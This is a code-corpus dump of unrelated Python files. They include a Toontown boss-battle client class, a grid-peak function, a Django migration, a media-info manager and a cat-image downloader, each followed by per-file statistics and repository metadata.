Func(camera.setPos, -3, 45, 25), Func(camera.setHpr, 0, 10, 0))), (1.0, Func(self.setChatAbsolute, TTLocalizer.LawbotBossDefenseWins1, CFSpeech)), (5.5, Func(self.setChatAbsolute, TTLocalizer.LawbotBossDefenseWins2, CFSpeech)), (9.5, Sequence(Func(camera.wrtReparentTo, render))), (9.6, Parallel( rollTrack, Func(self.setChatAbsolute, TTLocalizer.LawbotBossDefenseWins3, CFSpeech), self.door3.posInterval(2, doorEndPos, startPos=doorStartPos))), (13.1, Sequence(self.door3.posInterval(1, doorStartPos)))) retTrack = Parallel(bossTrack, ActorInterval(self, 'Ff_speech', loop=1)) return bossTrack def makeEpilogueMovie(self): epSpeech = TTLocalizer.WitnessToonCongratulations epSpeech = self.__talkAboutPromotion(epSpeech) bossTrack = Sequence(Func(self.witnessToon.animFSM.request, 'neutral'), Func(self.witnessToon.setLocalPageChat, epSpeech, 0)) return bossTrack def makeDefeatMovie(self): bossTrack = Track((0.0, Sequence(Func(self.clearChat), Func(self.reverseHead), ActorInterval(self, 'Ff_speech'))), (1.0, 
Func(self.setChatAbsolute, TTLocalizer.LawbotBossProsecutionWins, CFSpeech))) return bossTrack def __makeWitnessToon(self): dnaNetString = 't\x1b\x00\x01\x01\x00\x03\x00\x03\x01\x10\x13\x00\x13\x13' npc = Toon.Toon() npc.setDNAString(dnaNetString) npc.setName(TTLocalizer.WitnessToonName) npc.setPickable(0) npc.setPlayerType(NametagGroup.CCNonPlayer) npc.animFSM.request('Sit') self.witnessToon = npc self.witnessToon.setPosHpr(*ToontownGlobals.LawbotBossWitnessStandPosHpr) def __cleanupWitnessToon(self): self.__hideWitnessToon() if self.witnessToon: self.witnessToon.removeActive() self.witnessToon.delete() self.witnessToon = None return def __showWitnessToon(self): if not self.witnessToonOnstage: self.witnessToon.addActive() self.witnessToon.reparentTo(self.geom) seatCenter = self.realWitnessStand.find('**/witnessStandSeatEdge') center = seatCenter.getPos() self.notify.debug('center = %s' % center) self.witnessToon.setPos(center) self.witnessToon.setH(180) self.witnessToon.setZ(self.witnessToon.getZ() - 1.5) self.witnessToon.setY(self.witnessToon.getY() - 1.15) self.witnessToonOnstage = 1 def __hideWitnessToon(self): if self.witnessToonOnstage: self.witnessToon.removeActive() self.witnessToon.detachNode() self.witnessToonOnstage = 0 def __hideToons(self): for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: toon.hide() def __showToons(self): for toonId in self.involvedToons: toon = self.cr.doId2do.get(toonId) if toon: toon.show() def __arrangeToonsAroundWitnessToon(self): radius = 7 numToons = len(self.involvedToons) center = (numToons - 1) / 2.0 for i in xrange(numToons): toon = self.cr.doId2do.get(self.involvedToons[i]) if toon: angle = 90 - 15 * (i - center) radians = angle * math.pi / 180.0 x = math.cos(radians) * radius y = math.sin(radians) * radius toon.setPos(self.witnessToon, x, y, 0) toon.headsUp(self.witnessToon) toon.loop('neutral') toon.show() def __talkAboutPromotion(self, speech): if self.prevCogSuitLevel < 
ToontownGlobals.MaxCogSuitLevel: newCogSuitLevel = localAvatar.getCogLevels()[CogDisguiseGlobals.dept2deptIndex(self.style.dept)] if newCogSuitLevel == ToontownGlobals.MaxCogSuitLevel: speech += TTLocalizer.WitnessToonLastPromotion % (ToontownGlobals.MaxCogSuitLevel + 1) if newCogSuitLevel in ToontownGlobals.CogSuitHPLevels: speech += TTLocalizer.WitnessToonHPBoost else: speech += TTLocalizer.WitnessToonMaxed % (ToontownGlobals.MaxCogSuitLevel + 1) return speech def __positionToonsInFrontOfCannons(self): self.notify.debug('__positionToonsInFrontOfCannons') index = 0 self.involvedToons.sort() for toonId in self.involvedToons: if index in self.cannons: cannon = self.cannons[index] toon = self.cr.doId2do.get(toonId) self.notify.debug('cannonId = %d' % cannon.doId) cannonPos = cannon.nodePath.getPos(render) self.notify.debug('cannonPos = %s' % cannonPos) if toon: self.notify.debug('toon = %s' % toon.getName()) toon.reparentTo(cannon.nodePath) toon.setPos(0, 8, 0) toon.setH(180) renderPos = toon.getPos(render) self.notify.debug('renderPos =%s' % renderPos) index += 1 self.notify.debug('done with positionToons') def __makePrepareBattleTwoMovie(self): chatString = TTLocalizer.WitnessToonPrepareBattleTwo % ToontownGlobals.LawbotBossJurorsForBalancedScale movie = Sequence(Func(camera.reparentTo, self.witnessToon), Func(camera.setPos, 0, 8, 2), Func(camera.setHpr, 180, 10, 0), Func(self.witnessToon.setLocalPageChat, chatString, 0)) return movie def __doWitnessPrepareBattleThreeChat(self): self.notify.debug('__doWitnessPrepareBattleThreeChat: original self.numToonJurorsSeated = %d' % self.numToonJurorsSeated) self.countToonJurors() self.notify.debug('after calling self.countToonJurors, numToonJurorsSeated=%d' % self.numToonJurorsSeated) if self.numToonJurorsSeated == 0: juryResult = TTLocalizer.WitnessToonNoJuror elif self.numToonJurorsSeated == 1: juryResult = TTLocalizer.WitnessToonOneJuror elif self.numToonJurorsSeated == 12: juryResult = TTLocalizer.WitnessToonAllJurors 
else: juryResult = TTLocalizer.WitnessToonSomeJurors % self.numToonJurorsSeated juryResult += '\x07' trialSpeech = juryResult trialSpeech += TTLocalizer.WitnessToonPrepareBattleThree diffSettings = ToontownGlobals.LawbotBossDifficultySettings[self.battleDifficulty] if diffSettings[4]: newWeight, self.bonusWeight, self.numJurorsLocalToonSeated = self.calculateWeightOfToon(base.localAvatar.doId) if self.bonusWeight > 0: if self.bonusWeight == 1: juryWeightBonus = TTLocalizer.WitnessToonJuryWeightBonusSingular.get(self.battleDifficulty) else: juryWeightBonus = TTLocalizer.WitnessToonJuryWeightBonusPlural.get(self.battleDifficulty) if juryWeightBonus: weightBonusText = juryWeightBonus % (self.numJurorsLocalToonSeated, self.bonusWeight) trialSpeech += '\x07' trialSpeech += weightBonusText self.witnessToon.setLocalPageChat(trialSpeech, 0) def __makePrepareBattleThreeMovie(self): movie = Sequence(Func(camera.reparentTo, render), Func(camera.setPos, -15, 15, 20), Func(camera.setHpr, -90, 0, 0), Wait(3), Func(camera.reparentTo, self.witnessToon), Func(camera.setPos, 0, 8, 2), Func(camera.setHpr, 180, 10, 0), Func(self.__doWitnessPrepareBattleThreeChat)) return movie def countToonJurors(self): self.numToonJurorsSeated = 0 for key in self.chairs.keys(): chair = self.chairs[key] if chair.state == 'ToonJuror' or chair.state == None and chair.newState == 'ToonJuror': self.numToonJurorsSeated += 1 self.notify.debug('self.numToonJurorsSeated = %d' % self.numToonJurorsSeated) return def cleanupPanFlash(self): if self.panFlashInterval: self.panFlashInterval.finish() self.panFlashInterval = None return def flashPanBlue(self): self.cleanupPanFlash() intervalName = 'FlashPanBlue' self.defensePanNodePath.setColorScale(1, 1, 1, 1) seq = Sequence(self.defensePanNodePath.colorScaleInterval(0.1, colorScale=VBase4(0, 0, 1, 1)), self.defensePanNodePath.colorScaleInterval(0.3, colorScale=VBase4(1, 1, 1, 1)), name=intervalName) self.panFlashInterval = seq seq.start() self.storeInterval(seq, 
intervalName)

    def saySomething(self, chatString):
        """Have the Chief Justice speak chatString for four seconds.

        Any previous taunt interval is finished first so its pending
        clearChat cannot clobber the new line.
        """
        intervalName = 'ChiefJusticeTaunt'
        seq = Sequence(name=intervalName)
        seq.append(Func(self.setChatAbsolute, chatString, CFSpeech))
        seq.append(Wait(4.0))
        seq.append(Func(self.clearChat))
        oldSeq = self.activeIntervals.get(intervalName)
        if oldSeq:
            oldSeq.finish()
        seq.start()
        self.storeInterval(seq, intervalName)

    def setTaunt(self, tauntIndex, extraInfo):
        """Display the taunt selected by tauntIndex.

        For tauntIndex 0, extraInfo indexes into self.involvedToons and
        the taunt is personalised with that toon's name.  Bails out
        (printing a stack trace) when the boss lacks expected attributes
        or is not in the BattleThree state.
        """
        gotError = False
        if not hasattr(self, 'state'):
            self.notify.warning('returning from setTaunt, no attr state')
            gotError = True
        elif not self.state == 'BattleThree':
            self.notify.warning('returning from setTaunt, not in battle three state, state=%s', self.state)
            gotError = True
        if not hasattr(self, 'nametag'):
            self.notify.warning('returning from setTaunt, no attr nametag')
            gotError = True
        if gotError:
            st = StackTrace()
            print st
            return
        chatString = TTLocalizer.LawbotBossTaunts[1]
        if tauntIndex == 0:
            if extraInfo < len(self.involvedToons):
                toonId = self.involvedToons[extraInfo]
                toon = base.cr.doId2do.get(toonId)
                if toon:
                    chatString = TTLocalizer.LawbotBossTaunts[tauntIndex] % toon.getName()
        else:
            chatString = TTLocalizer.LawbotBossTaunts[tauntIndex]
        self.saySomething(chatString)

    def toonGotHealed(self, toonId):
        # Play the toon-up cue on the healed toon, if it still exists locally.
        toon = base.cr.doId2do.get(toonId)
        if toon:
            base.playSfx(self.toonUpSfx, node=toon)

    def hideBonusTimer(self):
        if self.bonusTimer:
            self.bonusTimer.hide()

    def enteredBonusState(self):
        """React to the jury bonus period starting.

        Announces the bonus via the witness toon, plays a cue and runs an
        on-screen countdown for the bonus duration.  The timer widget is
        created lazily on first use and reused afterwards.
        """
        self.witnessToon.clearChat()
        text = TTLocalizer.WitnessToonBonus % (ToontownGlobals.LawbotBossBonusWeightMultiplier, ToontownGlobals.LawbotBossBonusDuration)
        self.witnessToon.setChatAbsolute(text, CFSpeech | CFTimeout)
        base.playSfx(self.toonUpSfx)
        if not self.bonusTimer:
            self.bonusTimer = ToontownTimer.ToontownTimer()
            self.bonusTimer.posInTopRightCorner()
        self.bonusTimer.show()
        self.bonusTimer.countdown(ToontownGlobals.LawbotBossBonusDuration, self.hideBonusTimer)

    def setAttackCode(self, attackCode, avId = 0):
        # Extend the base handler: the area attack additionally gets a
        # spoken taunt and a warning sound.
        DistributedBossCog.DistributedBossCog.setAttackCode(self, attackCode, avId)
        if attackCode == ToontownGlobals.BossCogAreaAttack:
            self.saySomething(TTLocalizer.LawbotBossAreaAttackTaunt)
            base.playSfx(self.warningSfx)

    def setBattleDifficulty(self, diff):
        self.notify.debug('battleDifficulty = %d' % diff)
        self.battleDifficulty = diff

    def toonEnteredCannon(self, toonId, cannonIndex):
        # Only remember the cannon index for the local toon.
        if base.localAvatar.doId == toonId:
            self.cannonIndex = cannonIndex

    def numJurorsSeatedByCannon(self, cannonIndex):
        """Return how many chairs hold a toon juror fired from cannonIndex."""
        retVal = 0
        for chair in self.chairs.values():
            if chair.state == 'ToonJuror':
                if chair.toonJurorIndex == cannonIndex:
                    retVal += 1
        return retVal

    def calculateWeightOfToon(self, toonId):
        """Compute the local toon's evidence weight.

        Returns a (newWeight, bonusWeight, numJurors) tuple.  When the
        current difficulty enables the jury-weight feature
        (diffSettings[4]), the bonus is the number of jurors seated from
        this toon's cannon beyond the difficulty threshold
        (diffSettings[5]), floored at zero.
        """
        defaultWeight = 1
        bonusWeight = 0
        newWeight = 1
        cannonIndex = self.cannonIndex
        numJurors = 0
        if not cannonIndex == None and cannonIndex >= 0:
            diffSettings = ToontownGlobals.LawbotBossDifficultySettings[self.battleDifficulty]
            if diffSettings[4]:
                numJurors = self.numJurorsSeatedByCannon(cannonIndex)
                bonusWeight = numJurors - diffSettings[5]
                if bonusWeight < 0:
                    bonusWeight = 0
        newWeight = defaultWeight + bonusWeight
        self.notify.debug('toon %d has weight of %d' % (toonId, newWeight))
        return (newWeight, bonusWeight, numJurors)
45.157866
363
0.655889
7,598
83,813
7.184522
0.143064
0.024548
0.034073
0.017751
0.296237
0.240822
0.203488
0.162069
0.141075
0.114274
0
0.016161
0.235143
83,813
1,855
364
45.18221
0.835379
0
0
0.338452
0
0.000591
0.076122
0.024352
0
0
0
0
0
0
null
null
0.005316
0.019492
null
null
0.000591
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5ddabeb7b320c12ce5eecb63db650328a9b8e392
903
py
Python
utils/gridpeak.py
siwill22/magSA
9f3a12e6ed971d67444804cad57734dc0b4772ff
[ "MIT" ]
null
null
null
utils/gridpeak.py
siwill22/magSA
9f3a12e6ed971d67444804cad57734dc0b4772ff
[ "MIT" ]
null
null
null
utils/gridpeak.py
siwill22/magSA
9f3a12e6ed971d67444804cad57734dc0b4772ff
[ "MIT" ]
null
null
null
import numpy def gridpeak(t, X=None): # GP = GRIDPEAK(...) # gp = gridpeak(t) return gridpeaks based on Blakely # and Simpson method # gp = gridpeak(t,X) optionally remove peak values scoring less than X, # where X can be between 1 and 4. print 'shape ', t.shape m, n = t.shape p = 1 gp = numpy.zeros((m, n)) for i in numpy.arange(p, m - p): for j in numpy.arange(p, n - p): data = numpy.zeros(4) data[0] = t[i - p, j] < t[i, j] and t[i, j] > t[i + p, j] data[1] = t[i, j - p] < t[i, j] and t[i, j] > t[i, j + p] data[2] = t[i + p, j - p] < t[i, j] and t[i, j] > t[i - p, j + p] data[3] = t[i - p, j - p] < t[i, j] and t[i, j] > t[i + p, j + p] gp[i, j] = numpy.sum(data) if X: gp[gp < X] = numpy.nan gp = gp / gp return gp
29.129032
78
0.447398
165
903
2.448485
0.284848
0.079208
0.074257
0.059406
0.158416
0.158416
0.158416
0.158416
0.158416
0.158416
0
0.014414
0.385382
903
30
79
30.1
0.713514
0.245847
0
0
0
0
0.008889
0
0
0
0
0
0
0
null
null
0
0.055556
null
null
0.055556
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
5ddc336e8c10627292e9d9762e105aa2a19572a4
262
py
Python
Chapter 10/trackbackLog.py
Miillky/automate_the_boring_stuff_with_python
284b074b0738c66f38b54fe0fc5f69b3446e7e43
[ "MIT" ]
null
null
null
Chapter 10/trackbackLog.py
Miillky/automate_the_boring_stuff_with_python
284b074b0738c66f38b54fe0fc5f69b3446e7e43
[ "MIT" ]
null
null
null
Chapter 10/trackbackLog.py
Miillky/automate_the_boring_stuff_with_python
284b074b0738c66f38b54fe0fc5f69b3446e7e43
[ "MIT" ]
null
null
null
import traceback try: raise Exception('This is the error message.') except: errorFile = open('./Chapter 10/errorInfo.txt', 'w') errorFile.write(traceback.format_exc()) errorFile.close() print('The traceback info was written to errorInfo.txt')
32.75
60
0.709924
34
262
5.441176
0.794118
0.12973
0
0
0
0
0
0
0
0
0
0.009132
0.164122
262
8
60
32.75
0.835616
0
0
0
0
0
0.380228
0
0
0
0
0
0
1
0
false
0
0.125
0
0.125
0.125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5ddf93a5acfa110cbd927feae9cad660c39b795d
926
py
Python
lesson10019_projects/pen/data/transition.py
muzudho/py-state-machine-practice
e31c066f4cf142b6b6c5ff273b56a0f89428c59e
[ "MIT" ]
null
null
null
lesson10019_projects/pen/data/transition.py
muzudho/py-state-machine-practice
e31c066f4cf142b6b6c5ff273b56a0f89428c59e
[ "MIT" ]
null
null
null
lesson10019_projects/pen/data/transition.py
muzudho/py-state-machine-practice
e31c066f4cf142b6b6c5ff273b56a0f89428c59e
[ "MIT" ]
null
null
null
from lesson14_projects.pen.data.const import ( A, E_A, E_AN, E_IS, E_OVER, E_PEN, E_PIN, E_THAT, E_THIS, E_WAS, INIT, IS, PEN, THIS, ) pen_transition_doc_v19 = { "title": "This is a pen", "entry_state": INIT, "data": { INIT: { E_OVER: [INIT], E_THAT: [INIT], E_THIS: [INIT, THIS], THIS: { E_OVER: [INIT], E_WAS: [INIT], E_IS: [INIT, THIS, IS], IS: { E_OVER: [INIT], E_AN: [INIT], E_A: [INIT, THIS, IS, A], A: { E_OVER: [INIT], E_PIN: [INIT], E_PEN: [PEN], }, }, }, }, PEN: { E_OVER: None, }, }, }
19.702128
46
0.327214
93
926
2.967742
0.258065
0.163043
0.130435
0.144928
0
0
0
0
0
0
0
0.009592
0.549676
926
46
47
20.130435
0.652278
0
0
0.088889
0
0
0.035637
0
0
0
0
0
0
1
0
false
0
0.022222
0
0.022222
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5de3cc8b6cc08416f6501e8a2abc20d6706d9dfa
1,037
py
Python
Keywords/__init__.py
cassie01/PumpLibrary
c2a4884a36f4c6c6552fa942143ae5d21c120b41
[ "Apache-2.0" ]
null
null
null
Keywords/__init__.py
cassie01/PumpLibrary
c2a4884a36f4c6c6552fa942143ae5d21c120b41
[ "Apache-2.0" ]
null
null
null
Keywords/__init__.py
cassie01/PumpLibrary
c2a4884a36f4c6c6552fa942143ae5d21c120b41
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- from .Alarm.alarm import Alarm from .DeliveryView.bolus import Bolus from .DeliveryView.info import Info from .DeliveryView.infusion import Infusion from .DeliveryView.infusion_parameter import InfusionParameter from .DeliveryView.priming import Priming from .HardwareControl.motor import Motor from .MenuSettings.device_report import DeviceReport from .MenuSettings.history_log import HistoryLog from .MenuSettings.infusion_setting import InfusionSetting from .MenuSettings.maintenance import Maintenance from .MenuSettings.safety_setting import SafetySetting from .MenuSettings.system_setting import SystemSetting from .SensorControl.sensor import Sensor __all__ = ["Alarm", "Bolus", "Info", "Infusion", "InfusionParameter", "Priming", "Motor", "DeviceReport", "HistoryLog", "InfusionSetting", "Maintenance", "SafetySetting", "SystemSetting", "Sensor", ]
31.424242
62
0.695275
94
1,037
7.56383
0.340426
0.135021
0.067511
0
0
0
0
0
0
0
0
0.001245
0.225651
1,037
32
63
32.40625
0.884184
0.020251
0
0
0
0
0.129191
0
0
0
0
0
0
1
0
false
0
0.482759
0
0.482759
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
5de3f2eb79030c2d37fe6eb8becce065096245d7
1,656
py
Python
src/responsibleai/rai_analyse/constants.py
Azure/automl-devplat2-preview
05f327fe4c2504e9d49001ce26d8b49627214138
[ "MIT" ]
7
2021-05-12T01:52:09.000Z
2021-12-22T17:22:14.000Z
src/responsibleai/rai_analyse/constants.py
Azure/automl-devplat2-preview
05f327fe4c2504e9d49001ce26d8b49627214138
[ "MIT" ]
5
2021-04-16T21:27:44.000Z
2021-04-26T03:17:44.000Z
src/responsibleai/rai_analyse/constants.py
Azure/automl-devplat2-preview
05f327fe4c2504e9d49001ce26d8b49627214138
[ "MIT" ]
null
null
null
# --------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # --------------------------------------------------------- class DashboardInfo: MODEL_ID_KEY = "id" # To match Model schema MODEL_INFO_FILENAME = "model_info.json" RAI_INSIGHTS_MODEL_ID_KEY = "model_id" RAI_INSIGHTS_RUN_ID_KEY = "rai_insights_parent_run_id" RAI_INSIGHTS_PARENT_FILENAME = "rai_insights.json" class PropertyKeyValues: # The property to indicate the type of Run RAI_INSIGHTS_TYPE_KEY = "_azureml.responsibleai.rai_insights.type" RAI_INSIGHTS_TYPE_CONSTRUCT = "construction" RAI_INSIGHTS_TYPE_CAUSAL = "causal" RAI_INSIGHTS_TYPE_COUNTERFACTUAL = "counterfactual" RAI_INSIGHTS_TYPE_EXPLANATION = "explanation" RAI_INSIGHTS_TYPE_ERROR_ANALYSIS = "error_analysis" RAI_INSIGHTS_TYPE_GATHER = "gather" # Property to point at the model under examination RAI_INSIGHTS_MODEL_ID_KEY = "_azureml.responsibleai.rai_insights.model_id" # Property for tool runs to point at their constructor run RAI_INSIGHTS_CONSTRUCTOR_RUN_ID_KEY = ( "_azureml.responsibleai.rai_insights.constructor_run" ) # Property to record responsibleai version RAI_INSIGHTS_RESPONSIBLEAI_VERSION_KEY = ( "_azureml.responsibleai.rai_insights.responsibleai_version" ) # Property format to indicate presence of a tool RAI_INSIGHTS_TOOL_KEY_FORMAT = "_azureml.responsibleai.rai_insights.has_{0}" class RAIToolType: CAUSAL = "causal" COUNTERFACTUAL = "counterfactual" ERROR_ANALYSIS = "error_analysis" EXPLANATION = "explanation"
35.234043
80
0.710145
186
1,656
5.903226
0.295699
0.210383
0.10929
0.141166
0.161202
0.065574
0
0
0
0
0
0.00072
0.161232
1,656
46
81
36
0.789777
0.259662
0
0
0
0
0.337993
0.214638
0
0
0
0
0
1
0
false
0
0
0
0.851852
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5de7e5e6d54e182aae7ef185c563685a2425fd3b
1,211
py
Python
request_token/migrations/0009_requesttokenerror.py
alex-hutton/django-request-token
299c4cb22ce3012c7ef995a648e5b1ea6b8a84d7
[ "MIT" ]
null
null
null
request_token/migrations/0009_requesttokenerror.py
alex-hutton/django-request-token
299c4cb22ce3012c7ef995a648e5b1ea6b8a84d7
[ "MIT" ]
2
2019-11-13T22:22:41.000Z
2019-12-02T22:19:56.000Z
request_token/migrations/0009_requesttokenerror.py
hongquan/django-request-token
76a5f8fce268ff252900341c7dcd7e7d442effe1
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Generated by Django 1.10 on 2017-05-21 19:33 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('request_token', '0008_convert_token_data_to_jsonfield'), ] operations = [ migrations.CreateModel( name='RequestTokenErrorLog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('error_type', models.CharField(help_text='The underlying type of error raised.', max_length=50)), ('error_message', models.CharField(help_text='The error message supplied.', max_length=200)), ('log', models.OneToOneField(help_text='The token use against which the error occurred.', on_delete=django.db.models.deletion.CASCADE, related_name='error', to='request_token.RequestTokenLog')), ('token', models.ForeignKey(help_text='The RequestToken that was used.', on_delete=django.db.models.deletion.CASCADE, related_name='errors', to='request_token.RequestToken')), ], ), ]
44.851852
210
0.673823
142
1,211
5.549296
0.556338
0.040609
0.055838
0.083756
0.187817
0.121827
0.121827
0.121827
0.121827
0
0
0.0258
0.199835
1,211
26
211
46.576923
0.78741
0.0545
0
0
1
0
0.272329
0.079685
0
0
0
0
0
1
0
false
0
0.157895
0
0.315789
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
5de8ea4c838b0533ab68d0c0085a12cb95b9a807
896
py
Python
winter/controller.py
EvgenySmekalin/winter
24b6a02f958478547a4a120324823743a1f7e1a1
[ "MIT" ]
1
2020-03-28T14:54:28.000Z
2020-03-28T14:54:28.000Z
winter/controller.py
EvgenySmekalin/winter
24b6a02f958478547a4a120324823743a1f7e1a1
[ "MIT" ]
null
null
null
winter/controller.py
EvgenySmekalin/winter
24b6a02f958478547a4a120324823743a1f7e1a1
[ "MIT" ]
null
null
null
import typing from .core import Component _Controller = typing.TypeVar('_Controller') _ControllerType = typing.Type[_Controller] ControllerFactory = typing.NewType('ControllerFactory', typing.Callable[[typing.Type], object]) _controller_factory: typing.Optional[ControllerFactory] = None def controller(controller_class: _ControllerType) -> _ControllerType: Component.register(controller_class) return controller_class def set_controller_factory(controller_factory: ControllerFactory) -> None: global _controller_factory _controller_factory = controller_factory def build_controller(controller_class: _ControllerType) -> _Controller: if _controller_factory is None: return controller_class() return _controller_factory(controller_class) def get_component(controller_class: _ControllerType) -> Component: return Component.get_by_cls(controller_class)
30.896552
95
0.809152
91
896
7.582418
0.307692
0.197101
0.156522
0.147826
0
0
0
0
0
0
0
0
0.117188
896
28
96
32
0.872314
0
0
0
0
0
0.03125
0
0
0
0
0
0
1
0.222222
false
0
0.111111
0.055556
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
5deb5f7aaf6a1389fadf9c9089ff41e73863dbba
952
py
Python
libact/query_strategies/tests/test_variance_reduction.py
joequant/libact
4fbf4d59fd0d4e23858b264de2f35f674c50445b
[ "BSD-2-Clause" ]
1
2019-05-09T13:00:45.000Z
2019-05-09T13:00:45.000Z
libact/query_strategies/tests/test_variance_reduction.py
DunZhang/libact
e37e9ed6c36febe701d84b2d495c958ab02f0bc8
[ "BSD-2-Clause" ]
null
null
null
libact/query_strategies/tests/test_variance_reduction.py
DunZhang/libact
e37e9ed6c36febe701d84b2d495c958ab02f0bc8
[ "BSD-2-Clause" ]
1
2021-01-18T20:07:57.000Z
2021-01-18T20:07:57.000Z
import unittest from numpy.testing import assert_array_equal import numpy as np from libact.base.dataset import Dataset from libact.models import LogisticRegression from libact.query_strategies import VarianceReduction from .utils import run_qs class VarianceReductionTestCase(unittest.TestCase): """Variance reduction test case using artifitial dataset""" def setUp(self): self.X = [[-2, -1], [1, 1], [-1, -2], [-1, -1], [1, 2], [2, 1]] self.y = [0, 1, 0, 1, 0, 1] self.quota = 4 def test_variance_reduction(self): trn_ds = Dataset(self.X, np.concatenate([self.y[:2], [None] * (len(self.y) - 2)])) qs = VarianceReduction(trn_ds, model=LogisticRegression(), sigma=0.1) qseq = run_qs(trn_ds, qs, self.y, self.quota) assert_array_equal(qseq, np.array([4, 5, 2, 3])) if __name__ == '__main__': unittest.main()
31.733333
77
0.615546
128
952
4.421875
0.414063
0.017668
0.015901
0.014134
0
0
0
0
0
0
0
0.037868
0.25105
952
29
78
32.827586
0.755961
0.055672
0
0
0
0
0.008959
0
0
0
0
0
0.095238
1
0.095238
false
0
0.333333
0
0.47619
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
5df2f0f840a2ef6d66c1e525c680fc2bedf30ceb
487
py
Python
apps/06_lolcat_factory/you_try/PRD/cat_service.py
dparito/10Apps-Python_w-Andy
77ca1ec280729a9002e49071e2f31cb5bc7b75cd
[ "MIT" ]
1
2019-04-29T17:43:22.000Z
2019-04-29T17:43:22.000Z
apps/06_lolcat_factory/you_try/PRD/cat_service.py
dparito/10Apps-Python_w-Andy
77ca1ec280729a9002e49071e2f31cb5bc7b75cd
[ "MIT" ]
null
null
null
apps/06_lolcat_factory/you_try/PRD/cat_service.py
dparito/10Apps-Python_w-Andy
77ca1ec280729a9002e49071e2f31cb5bc7b75cd
[ "MIT" ]
null
null
null
import os import shutil import requests def get_cat(folder, name): url = "http://consuming-python-services-api.azurewebsites.net/cats/random" data = get_data_from_url(url) save_image(folder, name, data) def get_data_from_url(url): response = requests.get(url, stream=True) return response.raw def save_image(folder, name, data): file_name = os.path.join(folder, name + '.jpg') with open(file_name, 'wb') as fout: shutil.copyfileobj(data, fout)
22.136364
78
0.702259
72
487
4.597222
0.527778
0.120846
0.066465
0.084592
0.241692
0
0
0
0
0
0
0
0.176591
487
21
79
23.190476
0.825436
0
0
0
0
0
0.147844
0
0
0
0
0
0
1
0.214286
false
0
0.214286
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
5df431be7adb55ae6ec852df04ddc2566bd34906
2,411
py
Python
src/charma/media_info/manager.py
mononobi/charma-server
ed90f5ec0b5ff3996232d5fe49a4f77f96d82ced
[ "BSD-3-Clause" ]
1
2020-01-16T23:36:10.000Z
2020-01-16T23:36:10.000Z
src/charma/media_info/manager.py
mononobi/imovie-server
ed90f5ec0b5ff3996232d5fe49a4f77f96d82ced
[ "BSD-3-Clause" ]
24
2020-06-08T18:27:04.000Z
2021-06-06T12:01:39.000Z
src/charma/media_info/manager.py
mononobi/charma-server
ed90f5ec0b5ff3996232d5fe49a4f77f96d82ced
[ "BSD-3-Clause" ]
1
2020-12-20T05:29:04.000Z
2020-12-20T05:29:04.000Z
# -*- coding: utf-8 -*- """ media info manager module. """ from pyrin.core.mixin import HookMixin from pyrin.core.structs import Manager import pyrin.utils.path as path_utils from charma.media_info import MediaInfoPackage from charma.media_info.interface import AbstractMediaInfoProvider from charma.media_info.exceptions import InvalidMediaInfoProviderTypeError class MediaInfoManager(Manager, HookMixin): """ media info manager class. """ package_class = MediaInfoPackage hook_type = AbstractMediaInfoProvider invalid_hook_type_error = InvalidMediaInfoProviderTypeError REQUIRED_INFO = ('runtime', 'width', 'height') def _is_complete(self, info): """ gets a value indicating that given media info is complete. :param dict info: media info to be checked. :rtype: bool """ for item in self.REQUIRED_INFO: result = info.get(item) if result is None or result <= 0: return False return True def register_provider(self, instance): """ registers the given instance into media info providers. :param AbstractMediaInfoProvider instance: media info provider instance to be registered. :raises InvalidMediaInfoProviderTypeError: invalid media info provider type error. """ self.register_hook(instance) def get_info(self, file, **options): """ gets a dict containing media info of given file. :param str file: absolute path of video file. :raises InvalidPathError: invalid path error. :raises PathIsNotAbsoluteError: path is not absolute error. :raises PathNotExistedError: path not existed error. :raises IsNotFileError: is not directory error. :returns: dict(int runtime, int width, int height) :rtype: dict """ path_utils.assert_is_file(file) result = dict() for provider in self._get_hooks(): current_result = provider.get_info(file, **options) result.update(current_result) if self._is_complete(result) is True: break result.setdefault('runtime', 0) result.setdefault('width', 0) result.setdefault('height', 0) return result
28.702381
90
0.633762
255
2,411
5.890196
0.368627
0.065912
0.02996
0.037949
0
0
0
0
0
0
0
0.002934
0.293239
2,411
83
91
29.048193
0.878521
0.359602
0
0
0
0
0.026866
0
0
0
0
0
0.032258
1
0.096774
false
0
0.193548
0
0.548387
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
